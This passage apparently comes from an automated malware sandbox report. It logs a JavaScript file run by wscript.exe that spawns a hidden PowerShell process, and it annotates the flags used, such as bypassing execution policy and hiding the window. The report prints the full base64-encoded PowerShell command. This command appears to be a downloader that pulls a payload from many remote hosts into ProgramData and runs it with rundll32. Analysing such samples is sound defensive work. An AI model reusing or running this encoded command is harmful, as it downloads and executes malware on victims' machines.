EEARwA0AEEAWQBRAEIAcwBBAEEAPQA9AHYARgBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAyAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBOAFEAQQA9ACIAOwB9AH0AJAB0AGEAcgBhAHAAbwBuACAAPQAgACIAQQBuAHQAbABlAHIAcwBCAGEAZQBkAGUAawBlAHIAaQBhAG4AIgA7ACQAdABvAGwAegBlAHkAVQBuAHMAdAByAHUAYwB0AHUAcgBhAGwAIAA9ACAANQA2ADIAOwAkAFMAbwBhAHIAaQBuAGcAcwBSAGUAZQBuAHUAbgBjAGkAYQB0AGUAZAAgAD0AIAAiAHYAZQByAHIAdQBjAG8AdQBzACIAOwA=" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAGEAcgBiAGEAcgBpAG8AdQBzAG4AZQBzAHMASABvAHIAbgBwAGkAcABlAHMAIAA9ACAAIgBhAGcAZwByAGEAYwBlAE0AbwBuAGcAaABvAGwAIgA7ACQAQgBhAGcAcgBvAG8AbQBXAGgAaQBtAHMAaQBjACAAPQAgADgAMAA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAUQB1AGkAZABuAHUAbgBjACAAPQAgACIATQBpAGwAbABpAG0AaQBjAHIAbwBuACIAOwAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGsAQQBMAGcAQQB4AEEARABNAEEATgB3AEEAdQBBAEQASQBBAE4AQQBBADQAQQBDADQAQQBNAFEAQQAyAEEARABNAEEATAB3AEIAWQBBAEcANABBAFUAUQBCAGsAQQBEAEkAQQBZAGcAQgBNAEEAQwA4AEEAUgB3AEIAUwBBAEUARQBBAFMAUQBBAHoAQQBIAGMAQQBkAFEAQgByAEEAQQA9AD0AYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBFAGcAQQBNAEEAQgA0AEEARQBZAEEATQBnAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQAawBBAE8AQQBBAHYAQQBFAEUAQQBSAHcAQgAyAEEARgBvAEEAYQBBAEEANABBAEUATQBBAEwAdwBCAHoAQQBEAEkAQQBhAFEAQgBaAEEASABFAEEAVABRAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAFoAQQBCAEoAQQBFAGMAQQBVAHcAQgBGAEEARQBRAEEAYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAEUAQQBNAEEAQQB4AEEAQwA4AEEAYQBBAEEAMwBBAEQARQBBAEwAdwBCAGoAQQBGAFkAQQBNAFEAQgBKAEEARABrAEEAVwBnAEIANgBBAEcAYwBBAGQAUQBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAZABlAHMAaQBsAGkAYwBvAG4AaQB6AGUAIABpAG4AIAAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAAtAHMAcABsAGkAdAAgACIAYwBPAD0ATgAiACkAIAB7ACQAdgBpAHIAZwB1AGwAYQB0AGUAQQBsAGkAYwBhAG4AdAAgAD0AIAAiAHAAbwBrAGUAYgBlAHIAcgBpAGUAcwBIAHkAbgBkAGUAcgAiADsAJABDAHIAYQBuAGUAeQAgAD0AIAAiAHMAZQBtAGkAYwBvAG4AdgBlAHIAZwBlAG4AdABUAGgAaQByAHQAaQBlAHMAIgA7AHQAcgB5ACAAewAkAHUAbgByAGUAYwBrAG8AbgBlAGQATABpAHAAbwBjAGwAYQBzAGkAcwAgAD0AIAAiAFQAbwBsAGwAdABhAGsAZQByACIAOwAkAFIAZQBzAHUAcABpAG4AYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMABBAEMANABBAE0AZwBBAHcAQQBEAFEAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADMAQQBBAD0APQAiADsAJABzAGkAdABvAHQAbwB4AGkAcwBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAZQBzAGkAbABpAGMAbwBuAGkAegBlACkAKQA7AHcAZwBlAHQAIAAkAHMAaQB0AG8AdABvAHgAaQBzAG0AIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABzAGUAbQBpAHMAbwBsAGUAbQBuAG4AZQBzAHMALgBHAHIAZQBmAGYAbwB0AG8AbQBlAEMAYQBuAGEAbgBnAGkAdQBtADsAJABwAGwAYQBuAG8AZwByAGEAcABoAGkAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABBAEEATABnAEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATgBRAEEAMABBAEEAPQA9AGcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQASQBBAE4AQQBBAHgAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQASQBBAE0AUQBBAD0AZwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBuAEEARwBVAEEAYgBnAEIAbABBAEgASQBBAFkAUQBCAHMAQQBGAFUAQQBiAGcAQgBqAEEARwA4AEEAYgBnAEIAMgBBAEcAVQBBAGIAZwBCAHAAQQBHAFUAQQBiAGcAQgAwAEEAQwA0AEEAWQB3AEIAaABBAEcAWQBBAFoAUQBBAD0AIgA7ACQAZABhAHkAYgBvAG8AawBJAG4AZgBpAG4AaQB0AGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQgBBAEgAVQBBAGQAQQBCAHYAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAWQBnAEIAdgBBAEcAUQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgBwAEEASABNAEEAWgBRAEIAdQBBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQATQBBAE8AQQBBAD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHkAQQBHAFUAQQBkAEEAQgBsAEEASABNAEEAZABBAEIAcABBAEcAMABBAGIAdwBCAHUAQQBHAGsAQQBaAFEAQgB6AEEARgBNAEEAWQBRAEIAcwBBAEgAQQBBAGEAUQBCAHUAQQBHAGMAQQBiAHcAQgB3AEEARwBFAEEAYgBBAEIAaABBAEgAUQBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgAzAEEARwBrAEEAYQB3AEIAcABBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwAwAEEAYQBRAEIAegBBAEcARQBBAFoAQQBCADIAQQBHAFUAQQBjAGcAQgAwAEEARwBVAEEAYgBnAEIAagBBAEcAVQBBAFUAdwBCADAAQQBIAGsAQQBiAEEAQgB2AEEARwA0AEEAZQBRAEIAagBBAEcAZwBBAGEAUQBCAGgAQQBDADQAQQBkAGcAQgBqAEEAQQA9AD0AIgA7ACQAcwBlAG0AaQBuAGkAdQBtAEcAZQBvAGQAaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFEAQQBhAEEAQgBwAEEARwA4AEEAYgBnAEIAcABBAEcANABBAFoAUQBBAHUAQQBHAE0AQQBiAEEAQgBwAEEARwBNAEEAYQB3AEEAPQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdQBBAEQASQBBAE0AZwBBAHgAQQBBAD0APQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMgBBAEMANABBAE0AUQBBADUAQQBEAFkAQQBMAGcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQARQBBAE0AUQBBADMAQQBBAD0APQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAZQBtAGkAcwBvAGwAZQBtAG4AbgBlAHMAcwAuAEcAcgBlAGYAZgBvAHQAbwBtAGUAQwBhAG4AYQBuAGcAaQB1AG0AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADQANwA5ADQANAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYwB3AEIAbABBAEcAMABBAGEAUQBCAHoAQQBHADgAQQBiAEEAQgBsAEEARwAwAEEAYgBnAEIAdQBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBSAHcAQgB5AEEARwBVAEEAWgBnAEIAbQBBAEcAOABBAGQAQQBCAHYAQQBHADAAQQBaAFEAQgBEAEEARwBFAEEAYgBnAEIAaABBAEcANABBAFoAdwBCAHAAQQBIAFUAQQBiAFEAQQBzAEEASABBAEEAYwBnAEIAcABBAEcANABBAGQAQQBBADcAQQBBAD0APQAiADsAJABPAHUAdABwAGwAbwBkAGQAZQBkACAAPQAgACIAdgBpAHQAbwBjAGgAZQBtAGkAYwBhAGwAIgA7ACQAZwByAGEAbgBkAGUAdgBpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAaQBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBhAFEAQgB1AEEARwBjAEEAVABBAEIAbABBAEgAQQBBAGEAUQBCAGsAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAZwBCAHIAQQBBAD0APQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAUQBBAEwAZwBBADEAQQBEAE0AQQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAGwAQQBIAEEAQQBZAFEAQgBzAEEARwBFAEEAWgBRAEIAdgBBAEcAdwBBAGEAUQBCADAAQQBHAGcAQQBhAFEAQgBqAEEAQwA0AEEAYwBBAEIAaABBAEgASQBBAGQAQQBCAHUAQQBHAFUAQQBjAGcAQgB6AEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB1AEEARwBNAEEAWgBRAEIAeQBBAEcANABBAFoAUQBCAGsAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AIgA7AGIAcgBlAGEAawA7AH0AUgBlAGEAYwB0AEQATwBNADsAfQAgAGMAYQB0AGMAaAAgAHsAJABBAGQAaQBnAGUAaQBUAGgAeQBzAGUAbgAgAD0AIAAiAGEAdgBpAGEAbgBpAHoAZQBkAEIAbABhAHMAdABvAGMAaABlAG0AZQAiADsAJABIAHkAcABlAHIAZABpAHYAaQBzAGkAbwBuACAAPQAgACIAcABhAHIAYQBmAGwAbwBjAGMAdQBsAGEAcgAiADsAJABBAGMAZQB0AHkAbABjAHkAYQBuAGkAZABlAFEAdQBpAGQAZABsAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEASABnAEEAYwBBAEIAcwBBAEcAOABBAGEAUQBCADAAQQBFAE0AQQBiAHcAQgB5AEEASABNAEEAWgBRAEIAcwBBAEcAVQBBAGQAQQBCAGwAQQBHAFEAQQBMAGcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAGIAZwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAWQBRAEIAcwBBAEEAPQA9AHYARgBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAyAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBOAFEAQQA9ACIAOwB9AH0AJAB0AGEAcgBhAHAAbwBuACAAPQAgACIAQQBuAHQAbABlAHIAcwBCAGEAZQBkAGUAawBlAHIAaQBhAG4AIgA7ACQAdABvAGwAegBlAHkAVQBuAHMAdAByAHUAYwB0AHUAcgBhAGwAIAA9ACAANQA2ADIAOwAkAFMAbwBhAHIAaQBuAGcAcwBSAGUAZQBuAHUAbgBjAGkAYQB0AGUAZAAgAD0AIAAiAHYAZQByAHIAdQBjAG8AdQBzACIAOwA=" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Lrvoys.js" somever Unsuperlative | ||||||
parent_process | wscript.exe | martian_process | wscript "C:\Users\test22\AppData\Local\Temp\Lrvoys.js" somever Unsuperlative |
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -nologo | value | Hides the copyright banner when PowerShell launches | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -nologo | value | Hides the copyright banner when PowerShell launches | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\SysWOW64\wscript.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |